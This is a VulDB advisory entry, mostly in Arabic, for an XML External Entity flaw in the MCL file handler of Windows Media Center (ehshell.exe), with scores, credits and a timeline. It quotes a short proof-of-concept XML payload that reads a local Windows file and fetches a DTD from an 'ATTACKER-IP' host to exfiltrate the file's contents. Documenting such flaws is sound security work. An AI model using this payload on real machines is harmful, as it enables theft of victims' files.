Microsoft Windows Media Center 6.1.7600 MCL File ehshell.exe XML External Entity

CVSS الدرجة المؤقتة للميتا	سعر الإكسبلويت الحالي (≈)	درجة اهتمام CTI
5.9	$0-$5k	0.00

ثغرة أمنية مصنفة على أنها خطيرة تم أيجادها في Microsoft Windows Media Center 6.1.7600. المشكلة أثرت على دالة غير معروفة من الملف ehshell.exe من العنصر MCL File Handler. تؤدي عملية التلاعب إلى XML External Entity. تعريف الـ سي دبليو أي للثغرة الأمنية هو CWE-611. تم نشر الضعف 04/12/2016 بواسطة John Page (hyp3rlinx) كـ Microsoft Windows Media Center "ehshell.exe" XML External Entity كـ Mailinglist Post (Bugtraq). يمكن تحميل الاستشارة من هنا seclists.org. تم النشر بالتنسيق مع الشركة المالكة.

تتوفر معلومات تقنية. معدل انتشار هذه الثغرة أقل من المعدل العام. بالإضافة إلى ذلك، يتوفر استغلال. تم إتاحة الاستغلال للجمهور وقد يتم استغلاله. وقد أشار الاستشاري إلى أن:

Windows Media Center "ehshell.exe" is vulnerable to XML External Entity attack allowing remote access to ANY files on a victims computer, if they open an XXE laden ".mcl" file via a remote share / USB or from an malicious "windowsmediacenterweb" web link.

في حال وجود إثبات المفهوم، يتم الإعلان عنه كـ إثبات المفهوم. الإكسبلويت يمكن تحميلها من هناt seclists.org. تمت معالجة الثغرة كاستغلال يوم-صفر خاص لمدة لا تقل عن 94 يومًا. كسعر لثغرة يوم الصفر، قُدّر السعر في السوق السوداء بحوالي $100k أو أكثر. الكود الخاص بالاستغلال هو:

<?xml version="1.0"?>
<!DOCTYPE hyp3rlinx [
<!ENTITY % data666 SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % junk SYSTEM "http://ATTACKER-IP:8080/FindMeThatBiotch.dtd";>
%junk;
%param666;
%FindMeThatBiotch;
]>

في حال وجود Sometimes 'Windows Media Center' will crash, sometimes opens normally and other times will not open, but the files get accessed and exfiltrated.، فإن الإشعار يذكر ما يلي:

Sometimes 'Windows Media Center' will crash, sometimes opens normally and other times will not open, but the files get accessed and exfiltrated.

يحتوي التنبيه على الملاحظة التالية:

Vendor reply "Wont Fix" : October 19, 2016

منتجالمعلومات

النوع

Operating System

المجهز

Microsoft

الأسم

Windows Media Center

النسخة

6.1.7600

الرخصة

تجاري

الدعم

end of life (old version)

موقع إلكتروني

المجهز: https://www.microsoft.com/

CPE 2.3المعلومات

🔍

CPE 2.2المعلومات

🔍

CVSSv4المعلومات

VulDB متجه: 🔍
VulDB الاعتمادية: 🔍

CVSSv3المعلومات

VulDB الدرجة الأساسية للميتا: 6.5
VulDB الدرجة المؤقتة للميتا: 5.9

VulDB الدرجة الأساسية: 6.5
VulDB الدرجة المؤقتة: 5.9
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍

CVSSv2المعلومات

AV	AC	Au	C	I	A
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳

متجه	التعقيد	توثيق	السرية	الأمانة	التوفر
افتح	افتح	افتح	افتح	افتح	افتح
افتح	افتح	افتح	افتح	افتح	افتح
افتح	افتح	افتح	افتح	افتح	افتح

VulDB الدرجة الأساسية: 🔍
VulDB الدرجة المؤقتة: 🔍
VulDB الاعتمادية: 🔍

استغلالالمعلومات

الفئة: XML External Entity
CWE: CWE-611 / CWE-610
CAPEC: 🔍
ATT&CK: 🔍

ملموس: لا
محلي: لا
عن بُعد: نعم

التوفر: 🔍
وصول: عام
الحالة: إثبات المفهوم
المؤلف: John Page (hyp3rlinx)
لغة البرمجة: 🔍
تحميل: 🔍
تقدير السعر: 🔍
تقدير السعر الحالي: 🔍

0-Day	افتح	افتح	افتح	افتح
اليوم	افتح	افتح	افتح	افتح

استخبارات التهديدالمعلومات

الاهتمام: 🔍
الفاعلون النشطون: 🔍
مجموعات APT النشطة: 🔍

إجراءات مضادةالمعلومات

التوصية: لا يوجد تخفيف معروف
الحالة: 🔍

زمن الهجوم الفوري: 🔍
وقت تأخير الاستغلال: 🔍

الجدول الزمنيالمعلومات

01/09/2016 🔍
06/09/2016 +5 أيام 🔍
04/12/2016 +89 أيام 🔍
04/12/2016 +0 أيام 🔍
05/12/2016 +1 أيام 🔍
19/06/2019 +926 أيام 🔍

المصادرالمعلومات

المجهز: microsoft.com

استشارة: Microsoft Windows Media Center "ehshell.exe" XML External Entity
باحث: John Page (hyp3rlinx)
الحالة: غير معرفة
منسق: 🔍

GCVE (VulDB): GCVE-100-93953
scip Labs: https://www.scip.ch/en/?labs.20161013

إدخالالمعلومات

تم الإنشاء: 05/12/2016 11:50 AM
تم التحديث: 19/06/2019 05:26 PM
التغييرات: 05/12/2016 11:50 AM (56), 19/06/2019 05:26 PM (2)
كامل: 🔍
Cache ID: 216::103

Several companies clearly confirm that VulDB is the primary source for best vulnerability data.

مناقشة

لا توجد تعليقات بعد اللغات: ar + fa + en.

يرجى تسجيل الدخول حتى تتمكن من التعليق

التالي ▸نظرة عامة ◂ السابق

Want to stay up to date on a daily basis?

Enable the mail alert feature now!